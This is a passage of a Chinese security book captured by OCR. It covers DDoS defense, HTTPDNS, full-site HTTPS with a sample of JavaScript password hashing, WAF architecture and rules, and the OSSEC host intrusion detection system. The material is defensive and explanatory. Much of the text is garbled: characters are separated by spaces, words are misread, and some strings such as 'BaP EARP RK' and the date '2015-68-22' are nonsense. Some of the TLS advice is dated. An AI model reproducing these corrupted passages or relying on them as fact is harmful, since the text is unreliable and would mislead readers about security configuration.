关 。 所 以 防御 DDoS 这 事 得 看 一 下 动因 ， 不 能 盲目 应 对 。 





7.2.6 NIPS 场 景 


ADS 本 质 上 是 一 个 包 过 滤 设 备 ， 虽 功用 不 同 却 跟 IPS 有 点 相似 ， 之 
前 也 提 到 有 时 候 需 要 提供 全 站 IPS 的 虚拟 补丁 功能 ，ADS 设 备 就 可 以 充 
当 这 一 角色 ， 只 是 条 目 不 宜 多 ， 只 上 有 限 的 条 目 ， 下 面 的 是 NSFOCUS 
的 ADS 设 备 的 规则 编辑 界面 ，payload 可 自 定义 ， 如 图 7-17 所 示 。 





当 安 全 团队 能 力 尚 可 的 话 ， 可 以 通过 运行 POC exploit， 然 后 抓 包 找 
出 攻击 payload 的 特征 ， 编 辑 16 进 制 的 匹配 规则 ， 即 可 简单 实现 人 工 定 
ill. 


高 级 应 局 ， 模 式 匹 配 ， 模式 匹配 规划 

















































































































模式 匹配 规则 
添加 模式 匹配 一 
[m e 

BaP 

EARP RK /F 255.255.2550 F 

BARDO 从 | 到 

=P } 

MPRE PAE 255.255.255.0 

IAN 从 到 

协议 类 型 TCP 

Slee 丢弃 

是 大 入 用 OOF 

OER M 到 

包 长 度 范围 从 到 

TOS = 

TTL/Hopumit | 

UDP 校 验 | |]|(0 表 示 匹 配 校 验 和 为 0 的 数据 包 ，1 表 示 匹 配 校 痊 和 非 0 的 数据 包 ， 空 代表 匹配 所 有 数 挫 包 ) 
ICMP +) 

ICMFv6 类 型 ~- $) 

TCP 选 项 = $) 

TCP 标 记 O SYN OAKOFIN 2 RSTO) URG PSH 站 不 进行 标记 位 检查 

RER 0 ( 字 节 X(0--1480) 

深度 o ( 字 节 )(0--1480)》 

大 小 写 匹配 O2#204 

HERE | 普通 字符 $) 

(根据 特征 字符 类 型 输入 ， 十 六 进 制 支持 不 带 \X 形 式 的 输入 ， 格 式 如 "ababab" 或 "xabixab"， 圭 遂 字 符 不 支持 续 ' 宇 符 及 \x 宇 符 ) 
HOR 
| 长 度 小 于 255 个 字符 
| 创建 时 间 2015-68-22 21:14:31 














图 7-17 绿 盟 “ 黑 洞 * 规 则 目 定义 界面 


7.2.7” 破 防 和 反 制 


从 安全 管理 者 的 角度 看 ， 即 便 是 拥有 完整 的 4 层 防 御 机 制 也 并 非 无 
懈 可 击 ， 号 称 拥有 400-500G 防 护 能 力 的 平台 是 完全 有 可 能 被 打垮 的 ， 完 
全 的 防护 能 力 是 建立 在 人 、 策 略 、 技 术 手 段 都 生效 的 情况 才 有 的 ， 如 果 


这 些 环节 出 了 问题 ， 抗 DDoS 的 整个 过 程 可 能 会 失败 。 例 如 下 面 提 到 的 


这 些 问 题 : 








超大 流量 攻击 时 需要 用 到 黑洞 路 由 ， 但 黑洞 路 由 的 IP 需 要 由 防御 
方 定 义 和 联 动 , “联动 ”的 过 程 就 是 同上 游 设 备 发 送 封 茜 卫 的 通知 ， 如 采 
接口 不 可 用 ， 那 么 此 功能 会 失效 ， 所 以 ISP 级 的 防御 是 有 失效 可 能 性 
的 。 


CDN 云 清洗 服务 依赖 于 清洗 服务 丙 接管 域名 解析 ， 如 果 云 清洗 服 
务 丙 本 身 的 DNS 不 可 用 ， 也 将 导致 这 一 层面 的 防御 失效 ， 诸 如 此 类 的 问 
题 还 有 不 少 ， 这 些 抗 D 广 丙 上 自身 并 非 无 懈 可 击 。 


ADS 平 时 不 一 定 串 联 部 署 ， 但 攻击 发 生 引流 后 一 定 是 业务 的 前 站 
设备 ， 假 如 这 个 设备 本 映 存 在 DOS 的 可 能 ， 即 使 是 触发 了 bypass 也 相当 
于 防御 完全 失效 了 ， 为 一 方面 集 略 下 发 通常 是 ADS 设 备 跟 管 理 节 点 互 
通 ， 如 果 管 理 节 点 出 现 可 用 性 问题 ， 也 将 导致 ADS 防 御 的 一 系列 问题 。 











超大 流量 攻击 需要 人 工 干预 时 ， 最 基本 的 需求 是 安全 或 运 维 人 员 
能 在 办 公 网 络 连接 到 ADS 的 管理 市 态 ， 能 远程 运 维 ADS 设 备 ， 如 果 此 时 
办 公 网 络 的 运 维 管理 链 路 出 现 故障 ， 不 仪 切 断 了 人 员 操 作 ， 还 会 把 现场 
应 急 的 紧张 气氛 提升 一 个 量 级 ， 使 人 更 加 手忙脚乱 。 


以 上 并 不 在 于 提供 新 的 攻击 的 思路 ， 而 在 于 向 抗 DDoS 方案 的 制定 
者 提供 男 类 视角 以 便于 审视 方案 中 的 短 板 。 


7.2.8 ”立案 和 追踪 

目前 对 于 流量 在 100G 以 上 的 攻击 是 可 以 立案 的 ， 这 比 过 去 幸福 了 
很 多 。 过 去 没有 本 土 特 色 的 资源 甚至 都 没 法 立案 ， 但 是 立案 只 是 万 里 长 
征 的 第 一 步 ， 如 果 你 想 找到 人 人， 必须 成 功 完成 以 下 步骤 : 

:在 海量 的 攻击 中 ， 寻 找 倒 推 的 线索 ， 找 出 可 能 是 C&C 服务 器 的 IP 
或 相关 域名 等 。 

RAR” MECCA A o 

:通过 登录 了 P 或 借助 第 三 方 APT 的 大 数据 资源 〈 如 果 你 能 得 到 的 话 ) 
物理 定位 攻击 者 。 

- 陪 叔 叔 们 上 门 抓 捕 。 

.上 法 庭 诉讼 。 


如 果 抓 到 这 个 人 没有 特殊 有 身份， 也许 你 能 如 愿 ; 但 假如 遇 到 一 些 特 
殊 人 物 ， 你 几 个 月 都 白 忙 手 。 而 黑 吃 黑 的 能 力 则 依赖 于 安全 团队 本 身 的 
渗透 能 力 ， 且 有 闲情逸致 做 这 事 。 这 个 过 程 对 很 多 企业 来 说 成 本 还 是 有 
点 高 ， 光 有 实力 的 安全 团队 这 条 门槛 就 足以 砍 拓 绝 大 多 数 公 司 。 笔 者 过 
去 也 只 是 恰好 有 缘 遇 到 了 这 么 一 个 团队 。 








2015 H1 绿 盟 科 技 DDoS 威 胁 报告 


http://www.nsfocus.com.cn/upload/contents/2015/08/20150820101444 : 


华为 AntiDDoS8000 DDoS 防御 系统 


http://e.huawei.com/cn/products/enterprise-networking/security/anti- 


ddos/8000 


7.3 EPR 


1.HTTPDNS 


运营 商 为 了 减少 路 ISP 的 流量 结算 ， 会 在 本 网 内 缓存 ICP 的 内 容 ， 广 
告 联盟 等 甚至 也 会 劫持 域名 丛 换 广告 ， 劫 持 域名 解析 是 安全 上 的 一 大 隐 
患 ， 意 味 独 可 以 任意 操纵 缓存 ， 随 意 挂 马 。 








HTITPDNS 原 来 是 一 个 为 优化 用 户 体验 发 明 的 东西 ， 其 本 质 就 是 利 
用 HTTP 协 议 来 完成 域名 解析 ， 防 止 被 运营 商 动 持 ， 原 理 如 图 7-18 所 
示 。 通 常情 况 下 使 用 HITPDNS 的 客户 端 域名 解析 会 走 互 联网 公司 自己 
的 服务 器 ， 跳 过 运营 商 的 本 地 DNS， 这 个 产品 原来 的 目的 虽然 不 是 为 了 
安全 设计 ， 但 从 安全 上 来 看 缓解 了 一 些 问题 。 当 然 并 不 是 绝对 的 ， 
HTTPDNS 的 请 求 由 于 是 明文 的 ， 理 论 上 完全 可 以 劫持 。 只 不 过 劫持 的 
ABT CORRE KB. 


















IP : 202.108.7.3 


CA ov 
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用 户 接 人 模块 
运营 商 LocalDNS 服务 器 业务 授权 DNS 服务 器 


图 7-18 HTTPDNS 原 理 


如 果 硕 望 完 全 规避 DNS 解析 劫持 的 问题 ， 需 要 使 用 加 密 的 DNS 请 
求 ， 目 前 ETF 已 经 有 了 DNS over TLS 的 草案 : 
(https://datatracker.ietf.org/doc/draft-ietf-dprive-dns-over-tls/? 


include_text=1 ) ， 相 信 随 着 刚 需 会 很 快 变 成 现实 。 
2. 全 站 HTTPS 


全 站 HTTPS 主 要 解决 当前 越 来 越 严 峻 的 网 民 隐 私 泄 圳 问题， 减少 被 
中 间 人 监听 和 会 话 劫持 的 可 能 。 之 前 HTTPS 多 用 在 登录 和 交易 环节 ， 现 
在 国内 也 开始 紧 跟 国外 互联 网 的 趋势 逐渐 进入 全 站 HTTPS 时 代 。 





升级 成 全 站 HTTPS 对 于 大 型 站 点 来 说 是 一 个 比较 复杂 的 工程 ， 这 里 
只 强调 一 下 与 安全 相关 的 部 分 : 





:SSL/TLS 协 议 一 一 对 于 常用 的 协议 TLS1.2，TLS1.1，TLS1.0 和 
SSL3.0， 目 前 只 有 TLS1.1 和 TLS1.2 暂 时 没有 了 曝 已 知 的 安全 漏洞 ， 基 本 上 
互联 网 公司 的 在 线 业务 都 使 用 这 两 个 版 本 ， 在 TLS1.3 面 世 之 前 没有 太 多 
选择 。 





:加密 算 法 一 一 密 钥 交换 算法 建议 使 用 RSA 或 ECDHE_RSA。 内 容 传 
输 加 密 建 议 使 用 AES-GCM， 目 前 google 推 出 的 boring ssl 支 持 新 型 的 流 式 
加 密 算法 ChaCha20 也 可 用 于 内 容 加 密 。 


防 降级 攻击 一 一 降级 攻击 一 般 手 法 是 伪造 客户 端 请 求 ， 试 图 改变 

加 密 算法 为 不 安全 的 加 密 或 改变 协议 版 本 为 低 版 本 ， 针 对 这 样 的 攻击 ， 

要 配置 SCSV (Signaling Cipher Suite Value) 选项 ， 另 外 需要 禁止 客 
户 端 主动 重 协商 。 


:其 他 问题 一 一 如 果 为 提升 性 能 文 持 TFO (TCP Fast Open- 
RFC7413) ，TFO 实 际 上 人 允许 TCP|ISYN 包 带 payload， 对 现 有 的 抗 DDoS 
策略 会 产生 比较 大 的 影响 。 


大 型 站 点 除了 Web 服 务 避 需要 文 持 HTTPS 以 外 ，CDN 也 需要 文 持 
HTTPS， 一 般 情况 下 需要 把 网 站 的 私 钥 提 供给 CDN 服 务 商 ， 但 这 样 就 引 
入 了 第 三 方 的 风险 ， 不 得 不 提 的 是 cloudflare， 它 提供 了 keyless 的 HTTPS 
服务 ， 分 成 几 种 实现 ， 从 轻 度 到 重度 ， 如 图 7-19 所 示 。 





Flexible SSL 只 做 客户 端 浏览 器 到 CDN 之 间 的 HITPS 加 密 ， 回 源 使 


FAHTTP. Full SSL 这 个 层次 不 止 实现 前 者 ， 还 包括 CDN 到 源 站 之 间 也 是 
用 HTTPS， 但 不 校 验 服务 端 证 书 ， 而 第 三 个 层次 不 仅 全 HTTPS， 且 会 校 





验 服务 端 证 书 的 有 效 性 。 目 前 对 于 大 多 数 站 点 而 言 ， 也 就 是 做 到 





Flexible SSL 这 个 层次 ， 融 能 缓解 靠近 用 户 那 一 侧 被 劫持 的 问题 ， 后 面 
的 部 分 由 厂商 自己 来 保证 。 但 Flexible SSL 是 否 就 够 用 ， 要 看 具体 业 
务 ， 对 于 安全 性 和 隐私 保护 极 高 的 业务 ， 例 如 金融 行业 的 在 线 服务 的 





HTTPS 需 要 使 用 严格 版 本 的 SSL 加 密 。 


Flexible SSL 
ə 
i —— A — A 
On 
Visitor CloudFlare Origin server 


Full SSL 
Requires SSL on your host 


ff 一 一 一 个 一 a = 


Visitor CloudFlare Origin server 





Full SSL(strict) 
Requires a valid SSL certificate 


时 A —— = 


Visitor CloudFlare Origin server 


图 7-19 ”HTTPS 的 三 种 不 同 模式 


国 


即便 在 HITPS 的 状态 下 传输 口令 ， 假 如 网 关 流 量 被 劫持 ， 证 书 被 蔡 








换 ， 无 知 的 小 白 用 户 还 是 选择 了 不 安全 的 连接 怎么 办 ， 为 一 方面 现在 还 
出 现 了 在 IDC 测 支持 流量 的 攻击 行为 ， 后 一 种 盗号 的 效果 直 晕 拖 库 ， 于 
是 有 的 厂商 想到 了 在 HTTPS 的 基础 上 ， 在 应 用 层 再 实现 一 次 加 密 ， 即 便 
你 劫持 了 流量 ， 也 看 不 到 明文 。 以 茶 广 账 豆 的 网 页 登录 为 例 ， 登 录 过 程 
中 ， 在 客户 端 利用 JavaScript 先 将 用 户 输 入 的 口令 加 密 ， 然 后 再 提交 给 服 
务 端 。 











function preprocess(A){ 
var B= ""}; 
B += A.verifycode.value; / / 获取 验证 码 的 值 





B = B.toUpperCase(); / /将 验证 码 转换 成 大 写字 母 


A.p.value = md5(md5_3(A.p.value) + B); 
J / 先 将 口令 进行 














md5_3( ) 加密 ， 然 后 和 验证 码 再 做 一 次 


MDS 
return true 
} 





这 和 古 早 期 的 一 个 版 本 ， 后 来 变 成 如 下 加 窗 方 式 : 





md5(md5(hexchar2bin(md5(pwd) )+uin)+verifycode. toUpperCase() ) 





其 加 密 算 法 一 直 在 更 新 ， 不 过 这 里 只 是 为 了 举例 说 明 javaScript 加 密 
在 对 抗 劫持 下 的 作用 。 当 然 JavaScript 加 密 用 于 传输 密 文 只 是 一 方面 ， 另 
一 方面 也 是 为 了 防止 协议 逆 同 后 引发 的 业务 安全 问题 ， 例 如 自动 化 注册 


机 。 


4. 跨 IDC 传 输 加 密 


对 于 真正 发 生 于 IDC 链 路 层 的 劫持 ， 目 前 没有 很 好 的 解决 方案 ， 只 
能 尽 可 能 做 到 在 路 IDC 传 输 ， 路 安全 域 传 输 的 时 候 使 用 加 密 通 道 。 应 用 
层 文 持 全 流量 TLS 或 加 密 的 VPN 点 对 点 连接 。 


AWS〔 亚 蕊 还 的 公有 云 ) 是 业内 公认 安全 做 得 比较 好 的 平台 。 作 
为 第 三 方 平台 AWS 的 合 规 性 支持 是 目前 种 类 最 多 的 ， 包 括 : 





‘SOC 1/SSAE 16/ISAE 3402 (formerly SAS 70) 


‘SOC 2 


‘SOC 3 


‘FISMA, DIACAP, and FedRAMP 


-DOD CSM Levels 1-5 


‘PCI DSS Level 1 


‘ISO 27001 


TTAR 


“FIPS 140-2 


«MTCS Level 3 


“HIPAA 


‘Cloud Security Alliance (CSA) 


-Motion Picture Association of America (MPAA) 





之 所 以 能 做 到 这 个 程度 是 因为 基础 安全 做 得 比较 好 ， 表 现在 一 些 细 
节 上 ， 比 如 AWS 几 乎 所 有 的 上 层 产 品 都 文 持 TLS 加 密 传 输 ， 例 如 : S3 存 
储 、Glacier 备 份 、 所 有 类 型 RDS 服 务 、DynamoDB (Cache) 、 

Redshift (BI) ~ EMR (KE) 、Kinesis〈 流 式 计 算 ) 等 。 


参考 资料 

DNSpod d+ 
https://www.dnspod.cn/httpdns 
cloudflare: 


https://www.cloudflare.com/ssl/ 


7.4 ”应 用 防火 墙 WAF 


应 用 防火 墙 (Web Application Firewall, WAF) 是 Web 应 用 防护 系 
统 ， 也 称 “ 网 站 应 用 级 入 侵 防御 系统 ”。 通 过 针对 基于 HTTP/HTTPS 协 议 
的 流量 建立 检测 或 拦截 规则 ， 实 现 安全 防护 的 目的 。 因 其 部 署 较为 灵 
活 ， 且 对 业务 的 侵入 性 比较 小 ， 是 近 几 年 非常 受 欢 迎 的 一 类 安全 系统 ， 
且 商 业 化 产品 层出不穷 。 


7.4.1 WAF 架 构 分 类 


WAF 染 构 根 据 部 车 方式 的 不 同 ， 通 常 分 为 cname 部 获 、module 部 
稍 、 网 络 层 部 著 。 也 有 部 分 公司 根据 上 自身 需要 实施 混合 部 著 与 运营 的 染 
构 ， 这 通常 需要 一 定 的 架构 设计 和 开发 能 力 ， 包 括 业 务 方 的 配合 。 国 外 

球 商 业 产 品 的 WAF 支 持 导入 证 书 的 方式 来 解决 HTTPS 环 境 的 安全 防 
护 ， 通 闸 国 内 各 甲 方 安全 团队 目 研 WAF 产 品 基 本 不 文 持 HTTPS。 











1.cname 部 署 


这 是 近 几 年 国内 非常 流行 的 WAF 部 团 ， 知 道 创 罕 推出 的 “加 速 乐 ” 就 
是 其 代表 产品 。 其 部 闭 方 式 非常 简单 方便 。 只 需 将 域名 Cname 方 式 解析 
指 癌 加 速 乐 分 配 的 cname 别 名 就 完成 了 部 署 。 对 于 用 户 来 说 ， 整 个 WAF 








的 防护 和 运营 几乎 是 透明 的 。 


cname 方 式 最 大 的 优势 就 是 部 署 方便 快速 ， 且 理论 上 还 有 加 速 网 站 
性 能 还 和 阻 断 DDoS 攻击 等 效果 ， 实 现 了 安全 防护 和 性 能 优化 双重 目 
标 。 这 也 是 常见 的 厂商 宣 。 但 其 缺陷 也 是 非常 明显 的 ，HTTPS 流 量 是 无 
法 防护 的 ， 因 为 中 间 代 理 无 法 解析 请 求 内 容 ， 进 而 无 法 对 其 攻击 负载 做 
检测 与 防护 。 





2.module 部 署 


module 部 晋 的 WAF 典 型 产品 是 开源 软件 ModSecurity〈 官 方 网 
站 : http://www.modse-curity.org/ ) 。 最 初 ModSecurity 是 基于 Apache 
httpd 上 的 module 开 发 出 来 的 ， 针 对 HTTP/HTTPS 协 议 攻击 做 检测 和 防护 
的 开源 产品 。 现 在 已 经 衍生 出 HS 版 和 Nginx 版 。 








这 种 部 署 方式 相 比 cname 方 式 麻 烦 得 多 ， 需 在 webserver 部 普 \ 编 译 时 
文 持 modules， 编 译 完 ModSecurity 模 块 之 后 ， 修 改 webserver 配 置 文件 生 
效 。 它 通常 默认 就 已 经 有 大 量 的 安全 策略 规则 ， 但 如 果 全 局 用， 一 方面 
性 能 消耗 很 大 ， 另 一 方面 也 未 必 适 用 于 自身 环境 安全 问题 。 所 以 后 续 还 
要 对 规则 进行 优化 精简 和 按 需 增加 ， 对 运营 人 员 的 要 求 相 对 较 高 。 














基于 业务 环境 webserver 功 能 的 不 同 ， 还 出 现 了 一 些 非 典型 不 知名 的 
简易 WAF 类 产品 ， 这 些 相 对 小 众 ， 也 可 能 是 企业 安全 团队 上 自身 开发 和 





运营 的 。 例 如 基于 Nginx 的 LUA 脚 本 开发 的 WAF， 基 于 IIS 笑 选 器 开发 的 
WAF。 理 论 上 成 熟 的 webserver 均 有 module 等 二 次 开发 接口 ， 均 可 以 按 
需 开 发 建设 相应 WAF 类 功能 产品 。 


Module WAF 在 应 对 HTTPS 类 业务 时 非常 适用 ， 缺 点 是 产品 开发 与 
营 成 本 非 疝 高。 部署 过 程 需 要 业务 中 断 且 运营 人 员工 作 量 较 大 ， 需 逐 
台 Server 部 署 ， 对 于 规则 的 运营 也 需要 投入 大 量 人 力 。 所 以 适合 有 一 定 
开发 和 运营 能 力 ， 且 业务 规模 较 小 的 公司 。 





3. 网 络 层 部 署 











此 类 WAF 产 品 是 最 易 部 署 的 方式 ， 它 可 部 车 在 机 房 或 某 被 防护 的 
网 络 入 口 位 置 。 这 不 同 于 其 他 几 类 ， 它 的 部 署 和 运营 可 以 算是 真正 的 透 
明 。 不 需要 对 业务 有 太 多 侵入 与 变更 ， 特 别 适合 互联 网 公司 变更 多 、 架 
构 复杂 的 环境 。 








它 的 缺点 明显 ， 对 于 HTTPS 协 议 无 能 为 力 。 优 势 也 明显 ， 无 侵入 
性 ， 易 部 署 。 不 影响 业务 性 能 ， 可 旁 路 接 入 ， 通 过 RESET 包 阻 断 HTTP 





为 满足 业务 的 多 样 性 架构 的 灵活 性 ， 很 多 大 型 互联 网 公司 还 建立 了 
混合 型 的 WAF 集 群 。 可 以 通过 前 述 几 类 WAE 的 组 合 ， 实 现 相 互补 防 窗 


蓄 不 到 的 地 方 ， 真 正 实现 无 死角 防守 。 如 图 7-20 所 示 。 


7.4.2 WAF 安 全 策略 建设 





通常 一 个 WAF 产 品 起 码 会 有 两 类 规则; 1) 通用 型 主流 漏洞 检测 与 
MF; 2) 最 近 出 现 高 危 1day\0day 漏 洞 检测 与 防护 。 有 运营 能 力 和 重要 
资产 的 公司 会 针对 业务 特点 制定 出 第 三 类 业务 风险 类 型 的 检测 与 防护 。 











检测 分 析 
集群 






J 
Module WAF&webserver 









* ab ab 
Cname WAF webserver 
9 
È | 
wae 
& Jd 





网 络 层 WAF webserver 


图 7-20 ”混合 型 WAF 产 品 架 构 


1. 主 流 Web 漏 洞 检测 规则 


为 了 确认 是 否 履 新 “主流 高 危 Web 漏 将 ”这 个 标准 ， 我 们 需要 选择 参 
照 物 。 通 党 推荐 使 用 以 下 平台 : 


-owasp 测 试 指南 Chttp://www.owasp.org.cn/owasp-project/OTG ) 


各 主流 Web 漏 洞 扫 描 器 〈WVS 
https://www.acunetix.com/vulnerability-scanner/\APPS-CAN http://www- 


03.ibm.com/software/products/zh/appscan ) 
漏洞 测试 演示 平台 bWAPP Chttp://www.itsecgames.com/ ) 


借用 以 上 平台 ， 在 规则 建设 中 对 于 自 研 和 部 署 的 WAF 产 品 的 实际 
能 力 做 出 客观 的 评判 。 同 时 注意 ， 此 测试 与 迭代 优化 过 程 需要 周期 性 进 
行 ， 如 图 7-21 所 示 ， 安 全 工作 有 一 个 重要 的 特点 : 需要 及 时 更 新 。 








2. 最 狐 局 危 源 洞 检测 规则 





安全 系统 运营 最 重要 的 工作 内 容 之 一 ， 除 了 部 壮 窗 六 就 是 检测 能 
的 迭代 更 新 。 每 当 爆 出 最 新 漏洞 的 时 候 ， 运 营 人 员 必 须 第 一 时 间 跟 进 ， 
分 析 POC 和 漏洞 原理 ， 提 取 相 应 的 检测 规则 ， 及 时 部 普 新 规则 到 WAF 系 
统 。WAF 系 统 对 最 新 漏洞 攻击 的 阻 断 也 称 为 虚拟 补丁 ”， 意 为 非 真正 的 
安全 补丁 ， 只 是 临时 封 墙 攻击 行为 ， 为 业务 方 真 正 更 新 补丁 顾 得 宝贵 的 








啊 应 时 间 。 





在 0day\lday 爆 发 的 时 候 ， 赢 得 时 间 是 第 一 目标 ， 而 第 一 步 也 是 最 重 
要 的 一 步 就 是 及 时 获取 威胁 情报 (threat information) ， 如 图 7-22 所 示 。 
在 获取 到 情报 之 后 ， 组 织 运营 人 员 测 斌 分析， 提取 规则 上 线 ， 到 这 里 与 
之 前 的 规则 建设 流程 相同 。 


漏洞 平台 扫描 测试 规则 提取 测试 验收 


* BWAPP -WVS + Wireshark . OWASP 
* WebGoat * APPSCAN * tcpdump 





图 7-21 WAF 规 则 建设 流程 


威胁 情报 POC 测试 规则 提取 


部 署 更 新 


- TI . WVS + Wireshark - update WAF 


* metasploit . APPSCAN - tcpdump 





图 7-22 WAF 新 增 规则 建设 流程 





威胁 情报 的 获取 通常 可 以 通过 情报 渠道 、 订 阅 安全 工具 开发 社区 
RSS、 关 注 相 应 APP 官 方 安全 信息 等 方式 。 





3. 业 务 风 险 监 测 规则 


在 有 足够 的 运营 能 力 前 提 下 ， 业 务 方 可 提出 茶 类 规则 借用 WAF 等 
安全 系统 帮助 监控 某 些 业务 异常 行为 。 这 里 的 规则 多 数 分 两 类 : 1) 已 
发 现 的 业务 漏洞 ， 需 临时 封 增 攻击 行为 ， 为 漏洞 修补 恬 得 时 间 ，2) 东 
些 高 危 或 异常 行为 的 监控 ， 主 要 目的 生产 数据 ， 为 业务 异常 行为 分 析 提 
供 数据 基础 。 


7.4.3 WAF 性 能 优化 


在 中 小 型 网 络 中 购买 一 个 商业 WAF 产 品 基 本 能 满足 需求 ， 且 根据 
流量 大 小 还 可 以 选择 适 配 的 型 号 。 但 在 大 型 和 超大 型 网 络 中 ， 性 能 的 优 
务 变 成 关系 到 项 目 和 系统 生死 存亡 的 关键 性 问题 。 下 面 就 介绍 WAF 的 
性 能 优化 方式 。 


1. 染 构 优化 


在 WAF 项 目 评估 与 预 研 初期 ， 架 构 的 选择 是 评估 重点 ， 也 同样 影 
啊 最 终 产 品 的 性 能 。 选 择 考量 的 因素 包括 团队 能 掌控 与 选择 的 资源 ， 业 
务 方 对 性 能 的 敏感 度 ， 最 后 才 是 安全 运营 与 检测 能 力 效 果 的 考量 : 





:资源 一 一 如 果 拥 有 整个 机 房 的 网 络 建设 管理 权限 ， 则 可 以 考虑 在 
机 房 核 心 交 换 机 处 流量 镜像 到 我 们 的 WAF 设 备 ， 此 时 无 论 WAF 的 性 能 
如 何 ， 均 不 会 影响 业务 的 正常 运营 ， 是 较为 理想 的 以 检测 为 目的 的 
WAEF 架 构 。 








业务 性 能 一 一 安全 产品 对 性 能 的 影响 通常 是 业务 方 最 为 敏感 的 问 
题 ， 往 往 业 务 方 耗费 大 量 资源 投入 优化 为 提升 业务 性 能 螺 秒 级 的 啊 应 ， 
可 能 因 安 全 产品 的 接 入 立马 消耗 多 有 尽 。 如 采 不 能 解决 业务 方 挑 成 的 问 
题 ， 那 么 你 的 产品 基本 没有 被 接纳 的 机 会 。 所 以 核心 业务 基本 不 会 接受 
类 似 ModSecurity 那 种 侵入 性 的 安全 产品 ， 所 以 更 应 该 优先 选择 Cname 或 





接 入 层 module WAF 方 式 。 


2. 规 则 优化 


在 实际 检测 能 力 中 ， 规 则 计算 应 该 是 WAF 性 能 最 大 的 开销 ， 既 可 
能 影响 业务 性 能 指标 QPS， 在 大 型 网 络 中 对 计算 集群 的 资源 耗 用 也 较 
大 。 比 如 ModSecurity 历 史上 就 出 现 过 多 次 DOS 攻 击 漏 筒 ， 并 且 未 经 优 
化 的 规则 也 会 导致 WAF 因 资源 消耗 的 问题 主动 阁 制 挥 部 分 检测 能 


-算法 优化 一 一 WAF 的 流量 匹配 不 能 粗暴 地 直接 丢 给 正则 引擎 ， 那 
会 带 来 大 量 的 不 必要 的 开销 。 首 先 对 流量 进入 WAF 到 最 终 遍 历 各 种 规 
则 的 整个 流程 要 考虑 清楚 ， 层 层 筛选 直至 剩 下 真正 需要 进入 正则 匹配 的 
流量 ， 如 图 7-23 所 示 。 








优先 匹配 关键 字符 串 ， 
不 匹配 不 进入 
后 续 计 算 


放弃 无 风险 的 


as 
纯 静 态 资源 请 求 ”” 别 定义 匹配 条 件 ” 则 ， 不 走 正则 引擎 





图 7-23 ”算法 优化 原则 


正则 优化 一 一 Google 出 品 的 正则 引擎 RE2 是 目前 公认 的 较 好 引擎 ， 
相 比 传统 古老 的 PCRE 引 擎 更 快速 高 效 ， 可 以 作为 引擎 的 首选 。 但 在 实 
际 使 用 过 程 中 RE2 存 在 一 个 明显 的 问题 (至少 笔 者 写 书 的 时 候 还 存 
在 ) ， 那 就 是 对 二 进 制 数 据 流 匹配 存在 问题 ， 例 如 “ 隐 含 恶意 代码 的 图 
片 文件 上 传 ”> 这 类 场景 中 无 法 使 用 。 那 么 驶 要 求 WAF 文 持 规 则 配置 不 同 


的 正则 引擎 ， 当 评估 某 类 规则 可 能 磁 到 二 进 制 数据 流 时 ， 可 配置 为 
PCRE 引 擎 ， 默 认 则 用 RE2。 





Or ”入 侵 感 知 体系 





入 侵 感 知 是 目前 安全 防御 体系 建设 中 最 重要 的 一 环 ， 是 大 型 互联 网 
生产 网 络 的 核心 需求 。 本 章 从 系统 、 应 用 、 后 端 架 构 等 维度 讲述 入 侵 感 
知 体系 的 实现 方法 。 


8.1 主机 入 侵 检 测 


主机 入 侵 检测 系统 (Host-based Intrusion Detection System, HIDS) 
顾名思义 是 基于 主机 的 入 侵 检测 系统 ， 是 部 署 在 需要 防护 的 主机 服务 器 
上 的 一 种 软件 。 由 于 其 开发 部 署 需要 考虑 业务 环境 ， 其 架构 对 业务 系统 
侵入 性 的 部 署 也 带 来 了 版 本 适 配 等 开发 难题 ， 同 时 部 牙 过 程 也 需要 耗费 
大 量 运 维 成 本 。 商 用 产品 较 少 ， 以 至 于 现在 市 面 上 知名 的 商用 HIDS 几 
乎 没有 。 在 开源 产品 方面 有 著名 的 OSSEC， 被 各 中 小 型 互联 网 公司 选 
用 。 各 大 互联 网 公司 则 因为 生产 网 络 的 海量 IDC 环 境 不 得 不 自 研 HIDS 产 
品 ， 这 些 自 研 的 HDS 在 入 侵 对 抗 的 一 线 不 断 的 迭代 更 新 ， 其 能 力 和 效 
果 甚 至 会 比 商业 产品 更 好 ， 至 少 非常 适合 自身 的 生产 网 环境 ， 同 时 根据 
自身 安全 需求 它们 往往 已 经 不 再 是 传统 的 标准 HIDS 架 构 。 下 面 分 别 介 


绍 这 两 类 产品 。 











8.1.1 开源 产品 OSSEC 


OSSEC 是 著名 的 开源 HIDS 产 品 Chttp://www.ossec.net/) ， 且 长 期 
维护 更 新 。 它 的 版 本 窗 盖 了 主流 操作 系统 ， 文 持 Linux\BSD\Windows， 
以 及 Linux 的 多 个 发 行 版 的 不 同 版 本 ， 并 提供 源码 安装 ，RPM 和 DEB 安 
装 方式 。 非 常 适 合 中 小 型 网 络 ， 服 务 器 规模 小 于 10000 台 的 生产 网 环 
境 。 同 时 在 最 近 还 出 现 了 Virtual Appliance 版 ， 那 些 使 用 云 服务 的 小 企业 








也 可 以 选择 此 类 部 署 方式 。OSSEC 开 源 发 行 版 本 如 图 8-1 所 示 。 
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Server Virtual Appliance 2.8.2 
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ossec-vm-2.8.2.0va — README (mirror) 


ossec-hids-2.8.1.tar.gz — Release Notes 





ossec-vm-2.8.1.0va — README 


图 8-1 OSSEC 开 源 发 行 版 本 


OSSEC 是 典型 的 BS 架构 ，Agent 端 会 通过 各 种 模块 ， 分 析 并 采集 数 
据 上 报到 Server， 如 图 8-2 所 示 。 在 Server 端 接受 数据 ， 并 分 析 数 据 存储 
到 DB 或 通过 WUI 展 现 。 其 Agent 和 Server 端 都 可 以 通过 二 次 开发 ， 规 则 
变更 等 方式 ， 增 强 其 检测 能 力 ， 所 以 你 也 可 以 把 OSSEC 当 成 一 个 数据 采 
集 处 理 框架 。 


根据 处 理 数 据 量 和 机 房 布 置 的 需求 ， 整 个 大 的 公司 生产 网 可 以 划分 


成 多 个 处 理 集群 。Server 端 可 以 有 不 同 的 配置 方式 。 通 常 一 个 Server 集 
群 〈 数 据 收 集 & 分 析 & 存储 ) 最 多 配置 2000 台 agent 接 入 。 


l ossec AGENTS | 





Linux Agent 



















= 
数据 接收 


Windows agent 


T ` 
数据 分 析 存储 \ 展现 
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Ls -l 


图 8-2 ”OSSEC 典 型 架构 
OSSEC 的 管理 运营 如 下 : 


"Agent 部 车 一 一 OSSEC 的 入 侵 检 测 能 力 基 于 各 Agent 从 主机 上 采集 
到 的 数据 的 分 析 ， 在 整套 入 侵 检 测 系统 建设 第 一 步 就 是 部 署 Agent， 同 
一 套 入 侵 检 测 系统 中 可 以 有 众多 不 同 版 本 的 Agent 存 在 ， 包 括 





